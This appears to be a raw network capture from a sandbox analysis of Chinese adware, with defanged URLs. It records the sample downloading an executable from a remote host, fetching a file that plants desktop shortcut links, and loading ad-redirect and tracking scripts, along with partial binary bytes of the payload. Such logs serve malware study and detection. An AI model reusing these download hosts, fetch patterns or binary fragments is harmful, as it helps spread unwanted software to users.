360.............Uko.6..._Ash%..h/ ....5I...Z...!5.Z.-v.).Tl#....^..'....h..s...........Pj3.>.......O..tzA....}.c..-..C4.T.n..T.r.'F8.6?'d.....P...}$[.5r....v$..&x.......&:B3:;;..K,..|2f)...L..S..;......fK.5..Nj.B%;..X.."..Y.Y........7.-..;........8............(r.P.\...dBV?#...c/.?..V... \...z..U....g-L3[h.p...wpf.......D.Uy(TL..>.2.l7.T.;|K*..4.......).(X..e..9FQ.........s........F M....v;....V.0..44..../qp..Q(.\..d4o6.7.k...v_.[*.|..G.1....E..`...vAZ.k>.G.w...k...^b..Q..y@...^..s........ .. ....N...........:...u6} ..k....s%.r....e.&.'.<.;..d.Q)b....."hT1..g.1....k....zu.).$..W.U.....@...z.]Hfb.3.....s....4.....a}...;~......{v..._^......?..jAU...6q........G....V.$..i.W................a.n.\Z..`P..ZK..........g.........p......C....T..j..Ea....$.l..7T.....e|"\.m.......... .........i...`n.j.&.=P..U...L.....=.T..4...w.s:!......'....e5.z.{.....n........~...S{......0..
GET /stat.htm?id=1255080332&r=&lg=en-us&ntime=none&cnzz_eid=1909991955-1437851425-&showp=1916x902&t=&h=1&rnd=1737086510 HTTP/1.1
Accept: */*
Referer: hXXp://tj.sui17.com/will.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: oz.cnzz.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Tengine/1.4.6
Date: Sat, 25 Jul 2015 19:13:56 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 09 Mar 2015 09:01:02 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /api/c.php?platform_id=1&union_id=1222&union_type=7&link_id=29041 HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.5mnh.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 25 Jul 2015 19:14:02 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 25 Jul 2015 19:14:02 GMT
Cache-Control: no-cache, must-revalidate
Pramga: no-cache
39e..var gconfig={"platform_id":1,"platform_domain":"regapi.37.com","status_login_domain":"status.login.37.com","ad_domain_cdn":"http:\/\/kwcdn.000dn.com","platform_deploy":"1","union_id":1222,"union_type":7,"link_id":29041,"referer":"feitian_cpa","title":"\u4eca\u65e5\u706b\u7206\u5185\u6d4b\uff0c\u62a2\u5148\u6ce8\u518c\uff01","title_id":null,"banner_id":0,"ad_param":"26497cqjd1420150506","ad_name":"\u4f20\u5947\u7ecf\u517814\u5e74\u65b0\u7248\u672c[QP]","ad_id":"26497","swf_file":"\/swfs\/85\/26497cqjd1420150506\/","digest":null,"flash_path":"http:\/\/kwcdn.000dn.com\/swfs\/85\/26497cqjd1420150506\/","width":"1200","height":"600","left":"-270","top":"230","game_id":"275","game_server_id":"57729","template_id":3174,"proportion":"15","time_temp":"1437450223"};gconfig.key=3;.function getTimestamp(){var d=new Date();var timestamp=Date.parse(d) d.getMilliseconds();return timestamp}..var vtime = adltime = getTimestamp();..0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Date: Sat, 25 Jul 2015 19:14:02 GMT..Content-Type: application/x-javascript..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.2.14..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Last-Modified: Sat, 25 Jul 2015 19:14:02 GMT..Cache-Control: no-cache, must-revalidate..Pramga: no-cache..39e..var gconfig={"platform_id":1,"platform_domain":"regapi.37.com","status_login_domain":"status.login.37.com","ad_domain_cdn":"http:\/\/kwcdn.000dn.com","platform_deploy":"1","union_id":1222,"union_type":7,"link_id":29041,"referer":"feitian_cpa","title":"\u4e
<<< skipped >>>
GET /s/1/1222/ HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.5mnh.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 25 Jul 2015 19:14:03 GMT
Content-Type: text/html
Content-Length: 1280
Connection: keep-alive
Last-Modified: Fri, 07 Mar 2014 12:21:26 GMT
ETag: "5319b9c6-500"
Expires: Sat, 25 Jul 2015 20:14:03 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes
<html>.<head>.<meta http-equiv="Content-Language" content="zh-CN">.<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">.<title></title>.</head>.<body>.<script language="javascript">..//..var _domain_37 = "p.777wyx.com|p.17kuxun.com|p.zx910.com";..var _domain_67 = "p.yocc.net|p.zx915.com";..var _domain_95 = "p.haliyuya.com|p.0wan0.com";....//baidu_tg..var _domain_1 = "sgyx.17kuxun.com";..var _domain_2 = "sqyx.17kuxun.com";..var _domain_3 = "aszt.17kuxun.com";...var _domain_cu = document.domain;..if((location.search).indexOf('?404')!=-1){...if((location.href).indexOf('/s/1/403/')!=-1||(location.href).indexOf('/s/2/208/')!=-1||(location.href).indexOf('/s/3/1030/')!=-1){....url = "/nopage.html";...}else{....url = "/1/843.html";...}..}else if(_domain_37.indexOf(_domain_cu)!=-1){...url = "/1/820.html";..}else if(_domain_67.indexOf(_domain_cu)!=-1){...url = "/2/821.html";..}else if(_domain_95.indexOf(_domain_cu)!=-1){...url = "/3/822.html";..}else if(_domain_1.indexOf(_domain_cu)!=-1){...url = "/s/1/381/2763.html";..}else if(_domain_2.indexOf(_domain_cu)!=-1){...url = "/s/1/381/2747.html";..}else if(_domain_3.indexOf(_domain_cu)!=-1){...url = "/s/1/381/2764.html";..}else{...url = "/1/823.html";..}..document.location.href=url;.</script>.</body>.</html>.....
<<< skipped >>>
GET /s/1/1222/29041/2.js?uid=907191<=2500&key=3&tid=2&0.28468476743951643 HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: p.5mnh.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.4.2
Date: Sat, 25 Jul 2015 19:14:05 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
a..//success...0..HTTP/1.1 200 OK..Server: nginx/1.4.2..Date: Sat, 25 Jul 2015 19:14:05 GMT..Content-Type: application/x-javascript..Transfer-Encoding: chunked..Connection: keep-alive..a..//success...0..
GET /stat.htm?id=1254485011&r=&lg=en-us&ntime=none&cnzz_eid=1465502878-1437851671-&showp=1916x902&t=Y73ç§åæœç´¢ç¥žå™¨&h=1&rnd=1427650920 HTTP/1.1
Accept: */*
Referer: hXXp://61.196.186.155:73/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: oz.cnzz.com
Connection: Keep-Alive
Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh
HTTP/1.1 200 OK
Server: Tengine/1.4.6
Date: Sat, 25 Jul 2015 19:14:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 09 Mar 2015 09:01:02 GMT
Connection: close
Accept-Ranges: bytes
GIF89a.............!.......,...........D..;..
GET /?ali_trackid=2:mm_28882711_2549618_31192338:1437851643_2k3_1682349860 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Referer: hXXp://s.click.taobao.com/t_js?tu=http://s.click.taobao.com/t?e=m%3D2%26s%3D35qbAmPcNZ4cQipKwQzePCperVdZeJviEViQ0P1Vf2kguMN8XjClAgeSiZ4DAJSwSWmUbzNGsoQJQ2Ds%2BV2hm%2FdhTHoLjIagalccoinlb2h3Sd4VibvlLeo0BcZWWIRYYA%2FDpPH01wK9AmARIwX9K%2BAjBDXvuqoU47FHjfsActnIQu5PdXpojKJn5AyUbPoV&ref=&et=DI4g8GpnBMZ4S%2FhJ%2FRvF2FLeaGX7Mz%2BM
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Cookie: miid=6574692172682403620
Connection: Keep-Alive
Host: ju.taobao.com
HTTP/1.1 302 Found
Server: Tengine
Date: Sat, 25 Jul 2015 19:14:04 GMT
Content-Type: text/html
Content-Length: 258
Connection: keep-alive
Location: hXXps://ju.taobao.com/?ali_trackid=2:mm_28882711_2549618_31192338:1437851643_2k3_1682349860
Via: wagbridge010238184020.cm4[web]
Set-Cookie: bid=2; Domain=ju.taobao.com; Path=/; Expires=Wed, 12-Oct-2050 02:50:13 GMT
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine</body>..</html>..HTTP/1.1 302 Found..Server: Tengine..Date: Sat, 25 Jul 2015 19:14:04 GMT..Content-Type: text/html..Content-Length: 258..Connection: keep-alive..Location: hXXps://ju.taobao.com/?ali_trackid=2:mm_28882711_2549618_31192338:1437851643_2k3_1682349860..Via: wagbridge010238184020.cm4[web]..Set-Cookie: bid=2; Domain=ju.taobao.com; Path=/; Expires=Wed, 12-Oct-2050 02:50:13 GMT..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<h1>302 Found</h1>..<p>The requested resource resides temporarily under a different URI.</p>..<hr/>Powered by Tengine</body>..</html>....
GET /z_stat.php?id=1255080411 HTTP/1.1
Accept: */*
Referer: hXXp://VVV.91debug.com/ad.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: s4.cnzz.com
Connection: Keep-Alive
Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sat, 25 Jul 2015 19:13:59 GMT
Last-Modified: Sat, 25 Jul 2015 19:13:59 GMT
Cache-Control: max-age=5400,s-maxage=5400
Via: cache26.l2de1[655,200-0,M], cache21.l2de1[656,0], cache10.nl1[670,200-0,M], cache6.nl1[672,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:3:62699884
X-Swift-SaveTime: Sat, 25 Jul 2015 19:13:59 GMT
X-Swift-CacheTime: 5400
29d..(function(){function k(){this.c="1255080411";this.R="z";this.N="";this.K="";this.M="";this.r="1437851639";this.P="oz.cnzz.com";this.L="";this.u="CNZZDATA" this.c;this.t="_CNZZDbridge_" this.c;this.F="_cnzz_CV" this.c;this.G="CZ_UUID" this.c;this.v="0";this.A={};this.a={};this.la()}function g(a,b){try{var c=.[];c.push("siteid=1255080411");c.push("name=" f(a.name));c.push("msg=" f(a.message));c.push("r=" f(h.referrer));c.push("page=" f(e.location.href));c.push("agent=" f(e.navigator.userAgent));c.push("ex=" f(b));c.push("rnd=" Math.floor(2147483648*Math.random()));(new Image).src="hXXp://jserr.cnzz.com/log.php?" c.join("&")}catch(d){}}var h=document,e=window,f=en..1cda..codeURIComponent,l=decodeURIComponent,n=unescape;k.prototype={la:function(){try{this.U(),this.J(),this.ia(),this.H(),this.o(),this.ga(),.this.fa(),this.ja(),this.j(),this.ea(),this.ha(),this.ka(),this.ca(),this.aa(),this.da(),this.pa(),e[this.t]=e[this.t]||{},this.ba("_cnzz_CV")}catch(a){g(a,"i failed")}},na:function(){try{var a=this;e._czc={push:function(){return a.B.apply(a,arguments)}}}catch(b){g(b,"oP failed")}},aa:function(){try{var a=e._czc;if("[object Array]"==={}.toString.call(a))for(var b=0;b<a.length;b ){var c=a[b];switch(c[0]){case "_setAccount":e._cz_account="[object String]"==={}.toString.call(c[1])?c[1]:String(c[1]);.break;case "_setAutoPageview":"boolean"===typeof c[1]&&(e._cz_autoPageview=c[1])}}}catch(d){g(d,"cS failed")}},pa:function(){try{if("undefined"===typeof e._cz_account||e._cz_account===this.c){e._cz_account=this.
<<< skipped >>>
GET /sushou/sw/-2100_1_ss.exe HTTP/1.1
Connection: close
Cache-control: no-cache
Pragma: no-cache
Host: down.sushouspell.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Fri, 24 Jul 2015 14:56:47 GMT
Accept-Ranges: bytes
ETag: "1e6adef620c6d01:0"
Server: Microsoft-IIS/7.5
Date: Sat, 25 Jul 2015 19:13:58 GMT
Connection: close
Content-Length: 2484952
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....:J.................\..........!1.......p....@.......................... ........&......................................s...........t............%.8............................................................p...............................text...8Z.......\.................. ..`.rdata.......p.......`..............@..@.data...X............r..............@....ndata...`...@...........................rsrc....t.......v...v..............@..@........................................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h>B..H.P.u..u..u...Hr@..X...SV.5p>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e..9}...Dp@........FP.VT........ M............U....M....3...3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...e....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>
GET /btns/btns.js HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: web.fx.sushouspell.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Encoding: gzip
Last-Modified: Tue, 17 Mar 2015 07:58:04 GMT
Accept-Ranges: bytes
ETag: "0ceb3188860d01:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:14:11 GMT
Content-Length: 194
.............j.0.@.E.`....o-l?1. {N...&8.#.......P..B..x..4..\`..>..Q..qFtY.@'....()F...].>..T.@....1..;Al..c .N...2.....E....I...."r_T\$.....)......=h..X.............E5.....K.5.....:......ex...HTTP/1.1 200 OK..Content-Type: application/x-javascript..Content-Encoding: gzip..Last-Modified: Tue, 17 Mar 2015 07:58:04 GMT..Accept-Ranges: bytes..ETag: "0ceb3188860d01:0"..Vary: Accept-Encoding..Server: Microsoft-IIS/7.5..X-Powered-By: ASP.NET..Date: Sat, 25 Jul 2015 19:14:11 GMT..Content-Length: 194...............j.0.@.E.`....o-l?1. {N...&8.#.......P..B..x..4..\`..>..Q..qFtY.@'....()F...].>..T.@....1..;Al..c .N...2.....E....I...."r_T\$.....)......=h..X.............E5.....K.5.....:......ex.....
GET /happy/tb.ico HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
Host: tb.mulcent.com
HTTP/1.1 200 OK
Content-Type: image/x-icon
Last-Modified: Tue, 30 Dec 2014 09:27:35 GMT
Accept-Ranges: bytes
ETag: "1e8a5ad81224d01:0"
Server: Microsoft-IIS/7.5
Date: Sat, 25 Jul 2015 19:14:19 GMT
Content-Length: 37925
......00......h....... ......................(.......00.............. ......................h...n"........ ..1...'..00.... ..%..mY.. .... ............... .h.......(...0...`.................................................................................................................................................y.....9.9.9.9.9.........9.......................................................................9.............................................y..............................................9...............................................................y..................................................................................................y...............................................................s......................y......9.........................x...............................................................9...........................................................3.......;........................................................9.................................................9..............................9............................................................................................................9......9..................9...9....y....9.............9..................................9...........................................................................................y.....................................................y............................?....................................................................................................
<<< skipped >>>
GET /core.php?web_id=1254485011&t=z HTTP/1.1
Accept: */*
Referer: hXXp://61.196.186.155:73/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: c.cnzz.com
Connection: Keep-Alive
Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh
HTTP/1.1 200 OK
Server: Tengine
Content-Type: application/javascript
Content-Length: 764
Connection: keep-alive
Date: Sat, 25 Jul 2015 19:14:33 GMT
Last-Modified: Sat, 25 Jul 2015 19:14:33 GMT
Expires: Sat, 25 Jul 2015 19:29:33 GMT
Via: cache25.l2de1[1754,200-0,M], cache8.l2de1[1755,0], cache6.nl1[1761,200-0,M], cache2.nl1[1762,0]
X-Cache: MISS TCP_REFRESH_MISS dirn:11:423596192
X-Swift-SaveTime: Sat, 25 Jul 2015 19:14:33 GMT
X-Swift-CacheTime: 900
!function(){var p,q,r,a=encodeURIComponent,b="1254485011",c="",d="",e="online_v3.php",f="z13.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k["callRequest"]([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k["createScriptIcon"](n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/" c ".gif",p="<a href='" q "' target=_blank title='" j "'><img border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href='" q "' target=_blank title='" j "'>" j "</a>",k["createIcon"]([p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/javascript..Content-Length: 764..Connection: keep-alive..Date: Sat, 25 Jul 2015 19:14:33 GMT..Last-Modified: Sat, 25 Jul 2015 19:14:33 GMT..Expires: Sat, 25 Jul 2015 19:29:33 GMT..Via: cache25.l2de1[1754,200-0,M], cache8.l2de1[1755,0], cache6.nl1[1761,200-0,M], cache2.nl1[1762,0]..X-Cache: MISS TCP_REFRESH_MISS dirn:11:423596192..X-Swift-SaveTime: Sat, 25 Jul 2015 19:14:33 GMT..X-Swift-CacheTime: 900..!function(){var p,q,r,a=encodeURIComponent,b="1254485011",c="",d="",e="online_v3.php",f="z13.cnzz.com",g="1",h="text",i="z",j="站长统计",k=window["_CNZZDbridge_" b]["bobject"],l="http:",m="1",n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push
<<< skipped >>>
GET /app.gif?&cna=9c06DvdL 1kCASU5EL1qJWYh HTTP/1.1
Accept: */*
Referer: hXXp://tj.sui17.com/will.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: pcookie.cnzz.com
HTTP/1.1 200 OK
Server: Tengine
Date: Sat, 25 Jul 2015 19:13:58 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"
Set-Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh; expires=Tue, 22-Jul-25 19:13:58 GMT; path=/; domain=.cnzz.com
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
Pragma: no-cache
GIF89a.............!.......,...........L..;HTTP/1.1 200 OK..Server: Tengine..Date: Sat, 25 Jul 2015 19:13:58 GMT..Content-Type: image/gif..Content-Length: 43..Connection: keep-alive..P3P: CP="NOI DSP COR CURa ADMa DEVa PSAa PSDa OUR IND UNI PUR NAV"..Set-Cookie: cna=9c06DvdL 1kCASU5EL1qJWYh; expires=Tue, 22-Jul-25 19:13:58 GMT; path=/; domain=.cnzz.com..Expires: Thu, 01 Jan 1970 00:00:01 GMT..Cache-Control: no-cache..Pragma: no-cache..GIF89a.............!.......,...........L..;..
GET /paramfile/desktoplnk.txt HTTP/1.1
Connection: close
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0
HTTP/1.1 200 OK
Content-Length: 267
Content-Type: text/plain
Last-Modified: Mon, 13 Jul 2015 05:51:24 GMT
Accept-Ranges: bytes
ETag: "d06891f32fbdd01:6a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:15:53 GMT
Connection: close
...1.........5.........$hXXps://qianbao.baidu.com/hd/huafei?invite_code=NK4H7HMB$ParamFile\icos\20150713013721.ico..IE.........8.0$hXXp://jc.110160.com$ParamFile\icos\20150713014932.ico....................$http://jc.110160.com/ad.htm$ParamFile\icos\20150713015122.ico..
GET /js/vc.min.js HTTP/1.1
Accept: */*
Referer: hXXp://p.5mnh.com/s/1/1222/29041.html?uid=907191&
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: stuff.cdn.biddingx.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Last-Modified: Mon, 18 May 2015 09:05:29 GMT
Age: 44673
Content-Length: 582
Expires: Sun, 26 Jul 2015 06:49:33 GMT
Content-Encoding: gzip
Date: Sat, 25 Jul 2015 06:49:33 GMT
Server: nginx/1.4.4
CC_CACHE: TCP_HIT
Accept-Ranges: bytes
............]k.0......#-.gmCW..X.2.......F.......4-...d.I......GG..9z...n...V...a...zb&..(ZY[......_.$."S....bP....=@..M..tc..F[m_JIw.0.8:.. !.....8Ur..... (..D<..@..w...4...................0!.._.q...K2.f...!~R..".).\.GZ...Z...m|..m,U.<..y.t...$..,....%:e]...k.[MS.T...U..T.....p.*.L..G.A&.A.l`....8K1B=...(....qf..}.........Jw}eqB..!^.)..X.D...g{..i7F.S.[n..^.mY..d..^...&...vvs.-.M..A...Z.\.a.D[f.F..(P:.y.F.2.C..t&..MK..-y....6.V4..........g.Wp...5.Zh.r....7..:H......Im.?.c.1....a j.5...w....3.]...A...3 ...<..]....38s.m.vs./.....o...'.L...n.....h.T..I.p...i..o.m..Ra2..*.......HTTP/1.1 200 OK..Content-Type: application/x-javascript; charset=utf-8..Connection: keep-alive..Vary: Accept-Encoding..Last-Modified: Mon, 18 May 2015 09:05:29 GMT..Age: 44673..Content-Length: 582..Expires: Sun, 26 Jul 2015 06:49:33 GMT..Content-Encoding: gzip..Date: Sat, 25 Jul 2015 06:49:33 GMT..Server: nginx/1.4.4..CC_CACHE: TCP_HIT..Accept-Ranges: bytes..............]k.0......#-.gmCW..X.2.......F.......4-...d.I......GG..9z...n...V...a...zb&..(ZY[......_.$."S....bP....=@..M..tc..F[m_JIw.0.8:.. !.....8Ur..... (..D<..@..w...4...................0!.._.q...K2.f...!~R..".).\.GZ...Z...m|..m,U.<..y.t...$..,....%:e]...k.[MS.T...U..T.....p.*.L..G.A&.A.l`....8K1B=...(....qf..}.........Jw}eqB..!^.)..X.D...g{..i7F.S.[n..^.mY..d..^...&...vvs.-.M..A...Z.\.a.D[f.F..(P:.y.F.2.C..t&..MK..-y....6.V4..........g.Wp...5.Zh.r....7..:H......Im.?.c.1....a j.5...w....3.]...A...3 ...<..]....38s.m.vs./.....o...'.L...n.....h.T..I.p...i..o.m..Ra2..*
<<< skipped >>>
GET /ParamFile/icos/20150713013721.ico HTTP/1.1
Connection: close
Cache-control: no-cache
Pragma: no-cache
Host: tj.sui17.com
Accept: text/html, */*
Accept-Encoding: identity
User-Agent: Mozilla/3.0 (compatible; Indy Library)
HTTP/1.1 200 OK
Content-Length: 9662
Content-Type: image/x-icon
Last-Modified: Mon, 13 Jul 2015 05:37:21 GMT
Accept-Ranges: bytes
ETag: "a4bb44fd2dbdd01:6a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 25 Jul 2015 19:15:54 GMT
Connection: close
......00.... ..%......(...0...`..... ......$..#...#...................................................................B...B...B...B..:B..tB...B...B...B...B...B...B...3....t...s...s.v.t.=.u..%|.. w..........................................................................................................B...B...B..*B..wB...B...B...B...B...B...B...B...B...6... w...s...s...s...s...s...s.z.t.-.v...u..........................................................................................B...B...B..0B...B...B...B...B...B...B...B...B...B...B...6... w...s...s...s...s...s...s...s...s...s...t.3.v...u..........................................................................B...B...B...B...B...B...B...B...B...B...B...B...B...B...B...6... w...s...s...s...s...s...s...s...s...s...s...s...s...t...r..!y..............................................................B...B...B..=B...B...B...B...B...B...B...B...B...B...B...B...7... w...s...s...s...s...s...s...s...s...s...s...s...s...s...s...t.A!x...u......................................................B...B...B..`B...B...B...B...B...B...B...B...B...B...B...B...7... w...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...t.f.v...u..............................................B...B...B..tB...B...B...B...B...B...B...B...B...B...B...B...7... w...r...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...s...t.z.u...t......................................B...B...B..sB...B...B...B...B...B...B...B...B...B...B...@...5...#y.. u.. v.. v.. v.. v.. v...t...q...r...s...s...s
<<< skipped >>>
GET /html/click/7191_653.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.feitian001.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Expires: Sat, 25 Jul 2015 19:29:03 GMT
Date: Sat, 25 Jul 2015 19:14:03 GMT
Server: nginx/0.8.54
Content-Type: text/html; Charset=UTF-8
Transfer-Encoding: chunked
X-Powered-By: PHP/5.3.6
Cache-Control: public,max-age=900
Last-Modified: Sat, 25 Jul 2015 19:14:03 GMT
X-Via: 1.1 kf48:6 (Cdn Cache Server V2.0)
Connection: keep-alive
6d0..<html>..<head>..<title>ft_v1.0</title>..<style type="text/css">body {margin: 0;}</style>..</head>..<body><script language="javascript">..var ref=encodeURIComponent(document.referrer);..var i,s=0,adlist=new Array(),m=(new Date().getTime())0 1;..adlist[0]={img:'hXXp://c.tb1u.com/b/1/1376/gdd9fid.swf?uid=507191',url:'hXXp://js.feitian001.com/c/redirect.php?s=NzE5MSw2NTMsMA==',p:50};..adlist[1]={img:'hXXp://c.tb1u.com/b/1/1377/gdd9fid.swf?uid=507191',url:'hXXp://js.feitian001.com/c/redirect.php?s=NzE5MSw2NTMsMQ==',p:50};..for(i=0;i<2;i ){..if (m>s && m<=s adlist[i].p).break;..s =adlist[i].p;}..if (i>=2).i=2-1;..if (adlist[i].img.indexOf('swf')>0) {..document.write("<div style='position:absolute;z-index:1'><a href='" adlist[i].url "&domain=" ref "' target='_blank'><img src='hXXp://img.feitian001.com/img/click/dot.gif' width='300' height='250' border='0'></a></div>");..document.write("<object classid='clsid:D27CDB6E-AE6D-11cf-96B8-444553540000' codebase='hXXp://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,28,0' width='300' height='250' style='cursor:hand;cursor:pointer;'>");..document.write("<param name='movie' value='" adlist[i].img "'><param name='quality' value='high'><param name='wmode' value='transparent'>");..document.write("<embed wmode='transparent' src='" adlist[i].img "' width='300' height='250' quality='high' pluginspage='hXXp://VVV.mac
<<< skipped >>>
GET /z_stat.php?id=1255080332 HTTP/1.1
Accept: */*
Referer: hXXp://tj.sui17.com/will.html
Accept-Language: en-us
Accept-Encoding: gzip, deflate
